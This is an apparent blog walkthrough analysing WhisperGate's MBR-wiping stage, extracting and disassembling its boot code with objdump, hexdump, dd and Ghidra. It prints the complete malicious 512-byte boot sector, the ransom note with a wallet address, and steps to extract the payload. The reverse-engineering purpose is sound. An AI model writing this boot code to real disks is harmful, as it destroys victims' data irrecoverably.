Many years ago, I read through a catalog of master’s courses. One of the first courses in the program was about operating systems, and its very first topic was how to create a custom, operating-system-agnostic bootloader from scratch.

Custom bootloaders, much like custom inits and custom kernels, have a place in my heart where a Linux hobbyist still exists. The process is not necessarily difficult, but it does require a lot of reading into some narrow topics (such as the IA-32 Software Developer’s Manual, or relevant ARM64 resources on the topic). It can quickly become challenging depending on what exactly you want the boot code to do.

A good example of a widely known bootloader is GRUB. Most Linux desktop or server users know it through a handful of configurations and commands, like update-grub.

The grub-install command modifies the MBR on legacy BIOS systems, but most users aren’t interested in what it really does. Compared to a hand-written bootloader, the user may have limited visibility or control over the generated code. Often, it’s sufficient to know that it “just works.”

But where’s the fun in that?

Over the past decade, we’ve seen instances of ransomware and wipers leveraging MBR boot code for persistence and elevated privileges. My very first time hearing about MBR-based malware came with the reports of STUXNET. A few years later, a late friend in the Linux community had also brought it up (in a larger discussion about the desktop model’s attack surface).

This should raise a question: how difficult is it to write MBR malware? Before that, we should discuss the parameters for writing MBR boot code in general.

Malware in the MBR

Writing dubious or malicious boot code is a well-documented subject. If you’re new to the topic, I strongly recommend this writeup by Red Team Notes. It’s a fun starting point and a succinct introduction.

An interesting, if unfortunate, consequence of MBR code is that it runs in 16-bit “Real Mode.” This limits the boot code to a handful of rules and BIOS system interrupts.

Real Mode is also highly privileged. It runs well before the operating system loads, and therefore takes precedence over Linux root or Windows Administrator privileges. If abused, this can cause severe damage to the system and hard disks, and the operating system may have no knowledge of it or any way to deter it.

An interesting feature of Real Mode is that it is operating-system agnostic by design. This means that you could develop a different malware loader for many operating systems or architectures that overwrites the victim’s MBR with the same boot code. In other words, while malware strains are often Windows-based, you could just as easily write a Linux or BSD variant and get the same outcome.

MBR boot code is more likely to use real mode only to execute a second stage in 32-bit “Protected Mode.” This second stage will contain more sophisticated boot code and is the basis of how bootloaders, including GRUB, operate behind the scenes. For malware authors, this could provide more opportunities for better attacks.

Most modern computers are likely to use UEFI, not BIOS, to boot. At the cost of some complexity, UEFI offers robust features such as Secure Boot, and generally has an easier time booting from flash storage, such as NVMe. This is usually a good thing.

So, why bring up MBR malware now? Lots of legacy systems still use BIOS. If your grandma is still playing Solitaire on her same Windows XP computer from the 2000s, she’s probably running BIOS with MBR. The same is true for agencies or organizations running the same systems from ten, twenty, or thirty years ago.

As malware in and of itself, STUXNET is often considered one of the greats. At least, it’s one of the most widely studied. You can certainly find samples online as well as an entire GitHub repo with the code reverse engineered in C.

However, there are plenty of other MBR-based malware samples from the past decade. A notable example is a NotPetya variant, which employed a malicious MBR in order to facilitate ransomware. But another MBR-based sample caught my eye fairly recently: WhisperGate.

WhisperGate

WhisperGate is “a multi-stage wiper designed to look like ransomware.” The bit about being a wiper disguised as ransomware cannot be overstated. (It’s one reason why people will often recommend not to pay the attacker. With a wiper, the ransom money cannot recover your data, because even the attackers cannot recover your data.)

Campaigns which deployed WhisperGate targeted a handful of Ukrainian sectors, including government, nonprofit, and IT organizations. In September of last year, the group made headlines after the U.S. Department of Justice indicted several Russian officials who were linked to the malware campaign.

A well-documented WhisperGate variant used three stages: one to corrupt the bootloader (T1542), another to download the third stage from a Discord server, and a final one to both tamper with Windows Defender and to overwrite files from a pre-set list of extensions.

The first stage caught my attention.

CrowdStrike describes the MBR-corrupting routine with the following pseudocode:

for i_disk between 0 and total_detected_disk_count do
   for i_sector between 1 and total_disk_sector_count, i_sector += 199, do
      overwrite disk i_disk at sector i_sector with hardcoded data
   done
done

Note: The bit about skipping 199 sectors was, and still is, interesting. My best guess here is coverage. By writing to only every 199th sector, you get a good-enough tradeoff between data corruption and total execution time.
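To put a rough number on that tradeoff, here is a minimal Python sketch of the stride arithmetic. It assumes 512-byte sectors and a loop that starts at sector 1, as in the pseudocode above; the function names are my own and purely illustrative.

```python
SECTOR_SIZE = 512   # assumed bytes per sector
STRIDE = 199        # sectors between consecutive writes (0xc7)
START_LBA = 1       # first sector the loop targets


def sectors_hit(total_sectors: int) -> int:
    """Count how many of the sectors 1, 200, 399, ... exist on the disk."""
    if total_sectors <= START_LBA:
        return 0
    return (total_sectors - 1 - START_LBA) // STRIDE + 1


def coverage(total_sectors: int) -> float:
    """Fraction of the disk's sectors that would be overwritten."""
    return sectors_hit(total_sectors) / total_sectors


if __name__ == "__main__":
    ten_mb = 10 * 1024 * 1024 // SECTOR_SIZE    # 20480 sectors
    print(sectors_hit(ten_mb), f"{coverage(ten_mb):.2%}")
```

On a 10MB image this touches 103 sectors, about half a percent of the disk. That is a small fraction, but the writes are spread across the whole disk, so they are likely to land on file system structures and file contents alike.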

If you run WhisperGate in a public sandbox, it will likely do nothing. One sandbox in particular marked it safe because it probed the registry for two keys and aborted execution. This is likely defense evasion (T1497), as the key values were empty because of the sandbox configuration.

There’s a very good writeup on the malware, which I would strongly recommend reading. It covers the details succinctly and was a true starting point for this guide.

In my walkthrough here, I’ll simply expand on these findings by investigating a few questions:

How could we determine this was MBR malware?
What does the MBR boot code look like in the binary?
How can you isolate the MBR boot code?
How would you analyze the boot code using static and dynamic analysis?

To that end, we will take “the hard way” to investigate the boot code. The tools used here are well-known and open source, so you can follow along or follow up on anything discussed here. This guide uses a Unix-like environment for analysis.

Of note, we will spend far less time on the malicious installer, and far more time on the aspects of it that deal with the MBR code. The boot code specifically is the main point of discussion.

Extracting the MBR code

First, we need a sample of this malware. Both the CrowdStrike and the S2W guides investigate the sample with the following SHA256 hash:

a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92

You can download this from sites like the Malware Bazaar. Unzip it with the password, and you’ll have an EXE whose name matches the hash value.

If you’re on a Linux system, use objdump.

If you’re on macOS, you can use the equivalent package from Homebrew:

/opt/homebrew/Cellar/x86_64-elf-binutils/<version>/bin/x86_64-elf-objdump

First, let’s confirm the file type:

$ file a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92.exe

a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows

In this case, the filename is the same value as the hash. This is useful for initial analysis, but it’s a pretty long filename. Let’s alias it to wg.exe just for clarity moving forward:

cp a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92.exe wg.exe

Next, let’s dump strings (annotated):

$ strings wg.exe
(A) !This program cannot be run in DOS mode.
...
(B) AAAAA
Your hard drive has been corrupted.
In case you want to recover all hard drives
of your organization,
You should pay us  $10k via bitcoin wallet
1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via
tox ID 8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65
with your organization name.
We will contact you to give further instructions.
...
(C) glob-1.0-mingw32
(D) GCC: (GNU) 6.3.0
...
(E) CreateFileW
...
(F) WriteFile
...

Of interest, we find:

A: PE header artifact
B: Ransom note, repeated several times
C, D: Evidence that MinGW and GCC were used to build this
E, F: File manipulation calls for Windows

There are other interesting strings, but this discussion is about the MBR code specifically, so let’s focus on that. We know from other research that WriteFile is the API function that overwrites the MBR. However, even without prior knowledge (or an entire writeup) of the installer, WriteFile is a good starting point for analysis, because it can indiscriminately overwrite sections of the hard drive.

With that in mind, let’s focus on these strings specifically:

B tells us that the ransom note is not obfuscated or encrypted. This suggests that the MBR code may exist in cleartext, without any weird decoding or decryption routines. This makes it low-hanging fruit for analysis.
F confirms that WriteFile is used in this sample.
The call to CreateFileW at E opens the primary hard drive for writing the corrupted MBR code. Its result, a HANDLE type, becomes the first parameter in the call to WriteFile.

Disassemble and search for the WriteFile section. Notice it’s stripped, so we can’t grep the disassembly for something like call WriteFile. Instead, we need to find the virtual address of its import entry.

We can use the following formula:

ImageBase + RVA = VirtualAddress

To get these values, call objdump with the -x parameter:

$ objdump -x wg.exe
...
ImageBase		00400000
...
	vma:     Ordinal  Hint  Member-Name  Bound-To
--[snip]--
	0000a180  <none>  04f3  WriteFile
...

In this case, the image base is 0x00400000 and the relative virtual address (RVA) of the WriteFile import entry is 0x0000a180.

So:

0x400000 + 0xa180 = 0x40a180

If we grep the disassembly for references to 40a180, we end up at the import thunks, which jump through the import address table (IAT):

$ objdump -D -b binary -Mintel -m i386 wg.exe | grep 40a180 -B 4
    2ea0:	ff 25 94 a1 40 00    	jmp    DWORD PTR ds:0x40a194
    2ea6:	90                   	nop
    2ea7:	90                   	nop
    2ea8:	ff 25 80 a1 40 00    	jmp    DWORD PTR ds:0x40a180

Since the jmp statement for WriteFile is at address 0x2ea8, let’s grep for references to 2ea8 instead:

$ objdump -D -b binary -Mintel -m i386 wg.exe | grep 2ea8

    2ea8: ff 25 80 a1 40 00    jmp    DWORD PTR ds:0x40a180
    2ff9: e8 aa fe ff ff       call   0x2ea8

In addition to the import thunk itself, we also see a call to the thunk’s address, which confirms that WriteFile is used in this code.
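The call at 0x2ff9 stores its destination as a signed 32-bit displacement relative to the next instruction, which is how objdump arrives at 0x2ea8. As a quick sanity check, here is a minimal Python sketch of that arithmetic. The helper name call_target is my own and not part of any tool.

```python
import struct


def call_target(address: int, encoded: bytes) -> int:
    """Resolve the destination of a 5-byte x86 `call rel32` (opcode E8)."""
    if len(encoded) != 5 or encoded[0] != 0xE8:
        raise ValueError("expected a 5-byte E8 call instruction")
    # The displacement is a signed, little-endian 32-bit integer.
    (rel32,) = struct.unpack("<i", encoded[1:])
    # It is relative to the address of the instruction that follows the call.
    return (address + len(encoded) + rel32) & 0xFFFFFFFF


# Bytes copied from the objdump line `2ff9: e8 aa fe ff ff`.
print(hex(call_target(0x2FF9, bytes.fromhex("e8aafeffff"))))   # 0x2ea8
```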

Recall earlier that many results appeared containing the ransom note. To find which one is actually used, we can backtrack the assembly:

$ objdump -D -b binary -Mintel -m i386 wg.exe | grep 0x2ea8 -B 100
...
    2f7a:	be 20 40 40 00       	mov    esi,0x404020
...
    2f81:	8d bd e8 df ff ff    	lea    edi,[ebp-0x2018]
...
    2f91:	f3 a5                	rep movs DWORD PTR es:[edi],DWORD PTR ds:[esi]
...
    2fd1:	8d 85 e8 df ff ff    	lea    eax,[ebp-0x2018]
...
    2fed:	c7 44 24 08 00 02 00 	mov    DWORD PTR [esp+0x8],0x200
    2ff4:	00 
    2ff5:	89 44 24 04          	mov    DWORD PTR [esp+0x4],eax
    2ff9:	e8 aa fe ff ff       	call   0x2ea8

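The text snippet here shows how the data at 0x404020, which includes the ransom note, is copied into a stack buffer (the rep movs at 0x2f91) and then passed along as an argument to the WriteFile call at 0x2ff9. Ignoring that intermediate copy, we could express the call line in C like: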

WriteFile(fileHandle, (LPCVOID)0x404020, 0x200, 0, 0)

In this case, the data at 0x404020 contains the ransom note needed. 512 (0x200) bytes, the size of the MBR, are used in the call to WriteFile. This is likely the MBR code, but we want to prove it before relying on assumptions. So, let’s get the file offset and see what data exists there.

To find the file offset, first get the .data section’s VMA and File Offset:

$ objdump -x wg.exe
...
Sections:
Idx Name          Size      VMA       LMA       File off  Algn
...
  1 .data         00002038  00404000  00404000  00003200  2**5

We can determine the file offset with:

VirtualOffset - DataSectionVMA + DataSectionFileOffset

So:

0x404020 - 0x404000 + 0x3200 = 0x3220.
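The same conversion can be written as a small Python helper, which is handy when you need to translate more than one address. This is only a sketch: the Section tuple and va_to_file_offset are names I made up, and the values are copied by hand from the objdump -x output above rather than parsed from the PE headers.

```python
from typing import NamedTuple


class Section(NamedTuple):
    name: str
    size: int          # "Size" column from objdump -x
    vma: int           # "VMA" column
    file_offset: int   # "File off" column


def va_to_file_offset(va: int, sections: list[Section]) -> int:
    """Translate a virtual address into an offset within the file on disk."""
    for section in sections:
        if section.vma <= va < section.vma + section.size:
            return va - section.vma + section.file_offset
    raise ValueError(f"{va:#x} is not inside any known section")


DATA = Section(".data", 0x2038, 0x404000, 0x3200)
print(hex(va_to_file_offset(0x404020, [DATA])))   # 0x3220
```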

We can confirm this is correct using hexdump:

$ hexdump -C wg.exe | \
	grep 3220 -A $((0x1F))
00003220  eb 00 8c c8 8e d8 be 88  7c e8 00 00 50 fc 8a 04  |........|...P...|
00003230  3c 00 74 06 e8 05 00 46  eb f4 eb 05 b4 0e cd 10  |<.t....F........|
00003240  c3 8c c8 8e d8 a3 78 7c  66 c7 06 76 7c 82 7c 00  |......x|f..v|.|.|
00003250  00 b4 43 b0 00 8a 16 87  7c 80 c2 80 be 72 7c cd  |..C.....|....r|.|
00003260  13 72 02 73 18 fe 06 87  7c 66 c7 06 7a 7c 01 00  |.r.s....|f..z|..|
00003270  00 00 66 c7 06 7e 7c 00  00 00 00 eb c4 66 81 06  |..f..~|......f..|
00003280  7a 7c c7 00 00 00 66 81  16 7e 7c 00 00 00 00 f8  |z|....f..~|.....|
00003290  eb af 10 00 01 00 00 00  00 00 01 00 00 00 00 00  |................|
000032a0  00 00 41 41 41 41 41 00  59 6f 75 72 20 68 61 72  |..AAAAA.Your har|
000032b0  64 20 64 72 69 76 65 20  68 61 73 20 62 65 65 6e  |d drive has been|
000032c0  20 63 6f 72 72 75 70 74  65 64 2e 0d 0a 49 6e 20  | corrupted...In |
000032d0  63 61 73 65 20 79 6f 75  20 77 61 6e 74 20 74 6f  |case you want to|
000032e0  20 72 65 63 6f 76 65 72  20 61 6c 6c 20 68 61 72  | recover all har|
000032f0  64 20 64 72 69 76 65 73  0d 0a 6f 66 20 79 6f 75  |d drives..of you|
00003300  72 20 6f 72 67 61 6e 69  7a 61 74 69 6f 6e 2c 0d  |r organization,.|
00003310  0a 59 6f 75 20 73 68 6f  75 6c 64 20 70 61 79 20  |.You should pay |
00003320  75 73 20 20 24 31 30 6b  20 76 69 61 20 62 69 74  |us  $10k via bit|
00003330  63 6f 69 6e 20 77 61 6c  6c 65 74 0d 0a 31 41 56  |coin wallet..1AV|
00003340  4e 4d 36 38 67 6a 36 50  47 50 46 63 4a 75 66 74  |NM68gj6PGPFcJuft|
00003350  4b 41 54 61 34 57 4c 6e  7a 67 38 66 70 66 76 20  |KATa4WLnzg8fpfv |
00003360  61 6e 64 20 73 65 6e 64  20 6d 65 73 73 61 67 65  |and send message|
00003370  20 76 69 61 0d 0a 74 6f  78 20 49 44 20 38 42 45  | via..tox ID 8BE|
00003380  44 43 34 31 31 30 31 32  41 33 33 42 41 33 34 46  |DC411012A33BA34F|
00003390  34 39 31 33 30 44 30 46  31 38 36 39 39 33 43 36  |49130D0F186993C6|
000033a0  41 33 32 44 41 44 38 39  37 36 46 36 41 35 44 38  |A32DAD8976F6A5D8|
000033b0  32 43 31 45 44 32 33 30  35 34 43 30 35 37 45 43  |2C1ED23054C057EC|
000033c0  45 44 35 34 39 36 46 36  35 0d 0a 77 69 74 68 20  |ED5496F65..with |
000033d0  79 6f 75 72 20 6f 72 67  61 6e 69 7a 61 74 69 6f  |your organizatio|
000033e0  6e 20 6e 61 6d 65 2e 0d  0a 57 65 20 77 69 6c 6c  |n name...We will|
000033f0  20 63 6f 6e 74 61 63 74  20 79 6f 75 20 74 6f 20  | contact you to |
00003400  67 69 76 65 20 66 75 72  74 68 65 72 20 69 6e 73  |give further ins|
00003410  74 72 75 63 74 69 6f 6e  73 2e 00 00 00 00 55 aa  |tructions.....U.|

Note that the final bytes are 55 aa, the boot signature that marks a valid MBR. We can also see the ransom note in cleartext. This confirms that the 512 bytes from 0x3220 through 0x341f contain the MBR.

To isolate the boot code, use dd and extract it to wg-bootcode.raw:

dd if=wg.exe of=wg-bootcode.raw bs=1 skip=$((0x3220)) count=$((0x200))
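If you would rather script this step, the following Python sketch does the same extraction and also checks the 55 aa signature before writing anything. The function names are hypothetical, and the offset is the one computed above.

```python
MBR_SIZE = 512
BOOT_SIGNATURE = b"\x55\xaa"


def extract_boot_sector(image: bytes, offset: int) -> bytes:
    """Return the 512 bytes at `offset`, insisting on a 55 aa trailer."""
    sector = image[offset:offset + MBR_SIZE]
    if len(sector) != MBR_SIZE:
        raise ValueError("not enough data at that offset")
    if sector[-2:] != BOOT_SIGNATURE:
        raise ValueError("missing 55 aa boot signature")
    return sector


def extract_to_file(src_path: str, offset: int, dst_path: str) -> None:
    """File-based wrapper, equivalent in spirit to the dd command above."""
    with open(src_path, "rb") as src:
        sector = extract_boot_sector(src.read(), offset)
    with open(dst_path, "wb") as dst:
        dst.write(sector)
```

Calling extract_to_file("wg.exe", 0x3220, "wg-bootcode.raw") should produce the same file as dd, and it fails loudly if the offset is off by even one byte.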

At this point, you could apply the boot code to a RAW image and try it out yourself. To supplement this walkthrough, I’ve shared a script that will simulate the outcome in QEMU, then dump the results for analysis. You can adjust the parameters to see how hard disks of different sizes are affected after N seconds (default 5 seconds over 10MB).

For now, you should convince yourself that the malware will corrupt the hard drive. On to static analysis.

Analyzing the malicious boot code

Now we can disassemble only the 16-bit bootcode:

$ objdump -D -b binary \
	-mi386 \
	-Maddr16,data16,intel \
	wg-bootcode.raw

wg-bootcode.raw:     file format binary


Disassembly of section .data:

00000000 <.data>:
   0:	eb 00                	jmp    0x2
   2:	8c c8                	mov    ax,cs
   4:	8e d8                	mov    ds,ax
   6:	be 88 7c             	mov    si,0x7c88
   9:	e8 00 00             	call   0xc
   c:	50                   	push   ax
   d:	fc                   	cld
   e:	8a 04                	mov    al,BYTE PTR [si]
  10:	3c 00                	cmp    al,0x0
  12:	74 06                	je     0x1a
  14:	e8 05 00             	call   0x1c
  17:	46                   	inc    si
  18:	eb f4                	jmp    0xe
  1a:	eb 05                	jmp    0x21
  1c:	b4 0e                	mov    ah,0xe
  1e:	cd 10                	int    0x10
  20:	c3                   	ret
  21:	8c c8                	mov    ax,cs
  23:	8e d8                	mov    ds,ax
  25:	a3 78 7c             	mov    ds:0x7c78,ax
  28:	66 c7 06 76 7c 82 7c 	mov    DWORD PTR ds:0x7c76,0x7c82
  2f:	00 00 
  31:	b4 43                	mov    ah,0x43
  33:	b0 00                	mov    al,0x0
  35:	8a 16 87 7c          	mov    dl,BYTE PTR ds:0x7c87
  39:	80 c2 80             	add    dl,0x80
  3c:	be 72 7c             	mov    si,0x7c72
  3f:	cd 13                	int    0x13
  41:	72 02                	jb     0x45
  43:	73 18                	jae    0x5d
  45:	fe 06 87 7c          	inc    BYTE PTR ds:0x7c87
  49:	66 c7 06 7a 7c 01 00 	mov    DWORD PTR ds:0x7c7a,0x1
  50:	00 00 
  52:	66 c7 06 7e 7c 00 00 	mov    DWORD PTR ds:0x7c7e,0x0
  59:	00 00 
  5b:	eb c4                	jmp    0x21
  5d:	66 81 06 7a 7c c7 00 	add    DWORD PTR ds:0x7c7a,0xc7
  64:	00 00 
  66:	66 81 16 7e 7c 00 00 	adc    DWORD PTR ds:0x7c7e,0x0
  6d:	00 00 
  6f:	f8                   	clc
  70:	eb af                	jmp    0x21
...

For now, it’s enough to note that the data corruption is a result of calling BIOS Interrupt 13h (disk operations) in mode 43h (extended write sectors to drive). The parameters for this interrupt:

Registers	Description
AH	43h = function number for extended write
AL	bit 0 = 0: close write check, bit 0 = 1: open write check, bit 1-7:reserved, set to 0
DL	drive index (e.g. 1st HDD = 80h)
DS:SI	segment:offset pointer to the DAP

You can refer to the disassembly to see where these parameters are set up and where the call occurs. I’ll refer back to them throughout the rest of this analysis.

A quick note: the virtual offset here is 0x7c00. This is a requirement for most (if not all) MBR code, as the boot code will load at this address. This is because real-mode boot code is just RAW data, and doesn’t follow a well-defined format like an ELF or PE. Put another way, the entire 512-byte image is treated as the “code section,” which is simply not accurate.

And that is important to know because the “data section” in this boot code is also not clearly defined as it would be in an ELF or PE file. That’s why you see statements like:

   2:	8c c8                	mov    ax,cs
   4:	8e d8                	mov    ds,ax

By storing the value of cs (code segment) into ds (data segment), the boot code is setting up the entire 512 bytes as writable data. This allows the boot code to use areas of the image as data and obviates the need for explicit data segments or stack buffers. You can see this in the usage of <SIZE> PTR ds:<address>, in lines like:

  45:	fe 06 87 7c          	inc    BYTE PTR ds:0x7c87
  49:	66 c7 06 7a 7c 01 00 	mov    DWORD PTR ds:0x7c7a,0x1
...
  52:	66 c7 06 7e 7c 00 00 	mov    DWORD PTR ds:0x7c7e,0x0
...
  5d:	66 81 06 7a 7c c7 00 	add    DWORD PTR ds:0x7c7a,0xc7
...
  66:	66 81 16 7e 7c 00 00 	adc    DWORD PTR ds:0x7c7e,0x0

For example, the byte at location 0x87 is used to store the current hard drive index. The actual location here is just after the “AAAAA” string in the data area:

                            Disk Index                          As String
--------------------------------v--------------------------- -------v--------
00000080  00 00 41 41 41 41 41 00  59 6f 75 72 20 68 61 72  |..AAAAA.Your har|

We can see that the byte which holds the disk index is set to zero (0) initially. For each hard drive detected, this value will increase as the data-corruption routine continues. (Informationally, this also confirms that the malware will start by corrupting data on your primary hard drive.)
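Addresses such as 0x7c87 in the disassembly and offsets such as 0x87 in the raw image refer to the same byte. A minimal Python sketch of that mapping, assuming the standard real-mode rule that a linear address is segment * 16 + offset (the function names are my own):

```python
LOAD_ADDRESS = 0x7C00   # where the BIOS places the 512-byte boot sector


def linear_address(segment: int, offset: int) -> int:
    """Real-mode translation: shift the segment left by 4 bits, add the offset."""
    return (segment << 4) + offset


def to_file_offset(segment: int, offset: int) -> int:
    """Map a segment:offset pair back to a position in the raw image."""
    position = linear_address(segment, offset) - LOAD_ADDRESS
    if not 0 <= position < 512:
        raise ValueError("address is outside the boot sector")
    return position


print(hex(to_file_offset(0x0000, 0x7C87)))   # 0x87
print(hex(to_file_offset(0x07C0, 0x0087)))   # 0x87
```

Both calls name the same byte. Because this boot code uses absolute offsets like 0x7c87, it implicitly assumes that cs (and therefore ds) is zero.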

At the cost of using less intuitive code, this approach is rather brilliant given the space limitations of the MBR and its rigid boot-code specification.

Another note: the entire 512 bytes will disassemble, but anything after location 0x70 is just data, so its disassembly is incorrect. How can we infer that?

If you look at line 0x3c, you’ll note that si is loaded with the address 0x7c72, which maps to offset 0x72 in the raw image. This is an argument in the interrupt 0x13 call, so it should point to data, not code. Notice also that no address prior to 0x7c72 is referenced anywhere in this code for use with data read-write operations.

We can infer that the boot code ends just before this, with the jump at 0x70, whose disassembly establishes that the data-corrupting routine will literally never halt. Anything after that jump is just data meant for read-write purposes. Put another way, the boot code will not attempt to write any data before 0x72, hence the clipped disassembly earlier.

The MBR boot code displays a message and overwrites hard-drive sectors. I’m more interested in this second behavior, and the rest of the guide will focus exclusively on it. The research discussed earlier provides a good explanation, but we can expand on a few concepts that it left out: decompilation, DAP, and LBA.

Decompilation

Let’s start with decompilation. Something I found interesting at first was that the author didn’t decompile the MBR code. I tried it myself by hand, and again with Ghidra, and compared the results.

Note: To load the MBR binary into Ghidra, you’ll have to import the RAW file as x86 16-bit Real Mode. When the disassembly listing loads, right-click the first line, then click Disassemble. This should produce the correct disassembly along with some attempts at decompiled logic.

MBR code is small, so it’s fairly easy to decompile on your own. My first attempt used a form of pseudocode. The result looked something like this:

while True, do
    ds = cs
    *((uint16_t *)(ds+0x78)) = cs
    *((uint32_t *)(ds+0x76)) = 0x82
    
    mode = 0x43                                  // Extended write mode
    write_check = 0                              // Disable write verification
    disk_index = *((uint8_t *)(ds+0x87)) + 0x80  // Start at disk 1
    dap_start_addr = 0x72                        // Read from file offset 0x72
    
    error, _ =  interrupt(
                    0x13: interrupt_code, 
                    mode: ah, 
                    write_check: al, 
                    disk_index: dl, 
                    dap_start_addr: si
                )
                
    if error == 1, then
        *((uint8_t *)(ds+0x87)) += 1
        *((uint32_t *)(ds+0x7a)) = 1
        *((uint32_t *)(ds+0x7e)) = 0
    else
        *((uint32_t *)(ds+0x7a)) += 0xc7
        *((uint32_t *)(ds+0x7e)) += cf
    end if
    
done

Something that makes BIOS interrupts challenging is their lack of mapping to C syntax. This pseudocode uses a syntax like:

interrupt(code, args...)

Where args... are register names passed in alphabetical order (AH, AL, DL, and SI). But still, there’s no “official” way to express this. In translating this to a high-level language, the “best” approach will likely assume that each register represents a global variable of the same name.
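To see the control flow run, here is a small Python model of the same loop. It is a sketch under loud assumptions: INT 13h is replaced by a stand-in that fails whenever the drive does not exist or the LBA is past the end of the disk, and the model stops after max_drives probes, whereas the real boot code never halts. All names are hypothetical.

```python
def simulate(disk_sizes: list[int], max_drives: int = 4) -> dict[int, list[int]]:
    """Model the write loop against fake disks.

    disk_sizes[i] is the sector count of BIOS drive 0x80 + i.
    Returns the LBAs written, keyed by BIOS drive number.
    """
    written: dict[int, list[int]] = {}
    disk_index = 0    # the byte at 0x7c87
    lba = 1           # the DAP's starting LBA at 0x7c7a
    while disk_index < max_drives:
        drive = 0x80 + disk_index
        # Stand-in for INT 13h, AH=43h: the carry flag signals failure.
        exists = disk_index < len(disk_sizes)
        carry = not (exists and lba < disk_sizes[disk_index])
        if carry:
            disk_index += 1        # move on to the next drive
            lba = 1                # and reset the target sector
        else:
            written.setdefault(drive, []).append(lba)
            lba += 0xC7            # skip ahead 199 sectors
    return written


print(simulate([400, 250]))
```

With a 400-sector disk and a 250-sector disk, the model writes sectors 1, 200, and 399 on drive 0x80, then sectors 1 and 200 on drive 0x81.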

Many resources on reverse engineering will encourage you to write your own decompilation. The reason why is intuitive (learning moments), but sometimes it is also practical. To appreciate the practicality, let’s compare it to Ghidra’s decompilation of the same code block:

void FUN_0000_7c21(void)

{
  char *pcVar1;
  ulong *puVar2;
  long *plVar3;
  ulong uVar4;
  code *pcVar5;
  undefined2 unaff_CS;
  bool bVar6;
  
  do {
    while( true ) {
      *(undefined2 *)0x7c78 = unaff_CS;
      *(char **)0x7c76 = s_AAAAA_0000_7c82;
      bVar6 = 0x7f < *(byte *)((int)s_AAAAA_0000_7c82 + 5);
      pcVar5 = (code *)swi(0x13);
      (*pcVar5)();
      if ((bVar6) || (bVar6)) break;
      puVar2 = (ulong *)0x7c7a;
      uVar4 = *puVar2;
      *puVar2 = *puVar2 + 199;
      plVar3 = (long *)0x7c7e;
      *plVar3 = *plVar3 + (ulong)(0xffffff38 < uVar4);
    }
    pcVar1 = (char *)((int)s_AAAAA_0000_7c82 + 5);
    *pcVar1 = *pcVar1 + '\x01';
    *(undefined4 *)0x7c7a = 1;
    *(undefined4 *)0x7c7e = 0;
  } while( true );
}

Notice that these lines:

      bVar6 = 0x7f < *(byte *)((int)s_AAAAA_0000_7c82 + 5);
      pcVar5 = (code *)swi(0x13);
      (*pcVar5)();

Represent this assembly excerpt:

  35:	8a 16 87 7c          	mov    dl,BYTE PTR ds:0x7c87
  39:	80 c2 80             	add    dl,0x80
  3c:	be 72 7c             	mov    si,0x7c72
  3f:	cd 13                	int    0x13

In this case, the pointer to the DAP (in SI) is not represented at all. It’s also not obvious what bVar6 represents. It is the carry produced by add dl,0x80, which means Ghidra treats the interrupt as if it left CF untouched. This further complicates the next line:

      if ((bVar6) || (bVar6)) break;

The condition (bVar6) || (bVar6) seems redundant and appears to return a constant result. It appears to never break or always break, depending on the truthiness of the value. This is in sharp contrast to the IF/ELSE behavior, which is a bit more clear in the disassembly:

  41:	72 02                	jb     0x45  ; Error
  43:	73 18                	jae    0x5d  ; Success

I say “a bit more clear” because the JB and JAE mnemonics use the value in CF to determine where to jump, and that may be less forthcoming than a deliberate IF-ELSE like we use in higher-level languages. (In addition, the JB statement is unnecessary here.) Regardless, you may appreciate why some people still encourage the “hard way” of analyzing disassembled code over blindly trusting decompiled code.

Disk Address Packet (DAP)

Another area that was briefly touched on in the original analysis was the disk address packet (DAP). This is defined in the BIOS Enhanced Disk Drive Specification Version 3.0 documentation on page 4.

Offset	Type	Description
0	Byte	Packet size in bytes. Shall be 16 (10h) or greater. If the packet size is less than 16 the request is rejected with CF=1h and AH=01h. Packet sizes greater than 16 are not rejected, the additional bytes beyond 16 shall be ignored.
1	Byte	Reserved, must be 0
2	Byte	Number of blocks to transfer. This field has a maximum value of 127 (7Fh). A block count of 0 means no data is transferred. If a value greater than 127 is supplied the request is rejected with CF=1 and AH=01.
3	Byte	Reserved, must be 0
4	Double word	Address of transfer buffer. The is the buffer which Read/Write operations will use to transfer the data. This is a 32-bit address of the form Seg:Offset. If this field is set to FFFF:FFFF then the address of the transfer buffer is found at offset 10h
8	Quad word	Starting logical block address, on the target device, of the data to be transferred. This is a 64 bit unsigned linear address. If the device supports LBA addressing this value should be passed unmodified. If the device does not support LBA addressing the following formula holds true when the address is converted to a CHS value (…)

Note: Because we’re working with a 32-bit architecture in mind, I’m omitting the last two rows, which discuss 64-bit quadwords.

This represents 16 bytes (0x10 bytes) of total space. Recall that we observed earlier that the data at 0x7c72 is used for the DAP. We can use the file offset to get a range:

0x72 - (0x72 + 0x10) => 0x72 - 0x82

Let’s inspect these bytes:

00000070  eb af 10 00 01 00 00 00  00 00 01 00 00 00 00 00  |................|
00000080  00 00 41 41 41 41 41 00  59 6f 75 72 20 68 61 72  |..AAAAA.Your har|

This gives us a sequence:

10 00 01 00 00 00  00 00 01 00 00 00 00 00  00 00

The multi-byte fields in this data structure are little endian, so their bytes appear in reverse order. We can map this against the DAP specification:

File Offset	Value	Meaning
0x72	`0x10`	Constant 16 (0x10)
0x73	`0x00`	Constant 0
0x74	`0x01`	Transfer one block
0x75	`0x00`	Constant 0
0x76	`0x00000000`	Transfer buffer offset
0x7a	`0x0000000000000001`	Start at block one of the LBA

Recall that, at the beginning of this loop, the value at 0x76 was assigned the address 0x7c82, where the “AAAAA” marker sits just ahead of the ransom note:

  28:	66 c7 06 76 7c 82 7c 	mov    DWORD PTR ds:0x7c76,0x7c82

So the transfer buffer offset is really set to 0x00007c82 during runtime.
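The mapping can be double-checked by unpacking the 16 bytes with Python’s struct module. This is a minimal sketch: the field names are my own shorthand for the rows of the specification table, and the 4-byte buffer address is split into its offset and segment halves.

```python
import struct
from typing import NamedTuple


class DiskAddressPacket(NamedTuple):
    size: int
    reserved1: int
    block_count: int
    reserved2: int
    buffer_offset: int
    buffer_segment: int
    start_lba: int


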